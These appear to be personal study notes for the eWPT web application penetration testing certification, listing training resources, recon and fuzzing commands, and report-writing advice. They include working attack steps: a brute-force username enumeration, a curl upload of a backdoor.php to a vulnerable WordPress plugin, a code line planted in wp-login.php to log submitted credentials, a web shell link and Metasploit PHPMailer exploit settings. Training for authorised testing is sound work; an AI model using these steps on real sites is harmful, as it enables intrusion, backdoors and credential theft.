eWPT

elearnsecurity's Web Application Penetration Tester

Best resources for preparing: THM Nahamstore https://tryhackme.com/room/nahamstore THM Web Fundamentals Path Portswigger's Web Security Academy https://portswigger.net/web-security HackerOne https://www.hackerone.com/videos dnsenum -p 20 -s 100 --threads 5 cbs.com ./subbrute.py cbs.com whatweb site.com -v

patator http_fuzz url=http://userenumeration.site/login.php method=POST body='username=FILE0&password=FILE0' 0=/root/uesernames.txt follow=1 accept_cookie=1 -x ignore:fgrep='Invalid Username'

Work the Flow exploit searchsploit work the flow worktheflow

wordpress/wp-content/plugins wordpress/wp-content/plugins/work-the-flow-upload/README.txt

searchsploit -m exploits/php/webapps/36640.txt

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public-assets/jQuery-File-Upload-9.5.0/server/php/index.php

modify wp-login.php page

code insertion of: (right at the top)

//<?php file_put_contents('log.txt', file_get_contents('php://input')); ?>

Simple Php Shell https://github.com/heisway/simple-php-shell

Prevent Clickjacking

<?php
//header('X-Frame-Options: SAMEORIGIN');
?>

PhpMailer vuln: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

search phpmailer use exploit/multi/http/phpmailer_arg_injection set RHOST set WEB_ROOT /var/www/html set LHOST ip exploit

SWF Investigator

soapexample.com/WS.php?wsdl

Chaining vulns chained 3 vulnerabilities (A path traversal, An SSRF in an external piece of software, and a post-authentication RCE) into a full pre-auth RCE

Report Want the report to be:

• Exhaustive

• Clear

• Good Looking

• On-time

• Adhering to goals

Executive Summary --> Vulnerability Report --> Remediation Report intro for Executive summary

The purpose of this assessment and report is to identify any web application issues that could affect ABC application and the web server hosting it, and to provide solutions to remedy these same issues. Use Graphs, Charts, stats and tables. Text should only be used to explain charts and give final estimation on the state of security.

Resources to train: THM Web Fundamentals Path https://portswigger.net/web-security/all-labs https://tryhackme.com/room/nahamstore

fuzzing: wfuzz -c -z file,/usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u "http://nahamstore.thm/" -H "Host: FUZZ.nahamstore.thm" --hw 65

Burp Suite Scanner - issue definitions with their ratings

What can Burp help me with?

DanielMiessler SecLists

GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.GitHub

when to Fuzz?

• Do not rely on any automated tools

• Take good notes

• to have Knowledge about chaining vulnerabilities together - in order to achieve greater impact

• test ALL the parameters, the attack point can be in the most unexpected place

• Do not forget to include POC, CVSS scoring or Mitigation recommendations in the report Flash, CORS, and the NoSQL databases are not relevant for the exam. Of those three it's probably still a good idea to invest some time into CORS, and a little of NoSQL databases.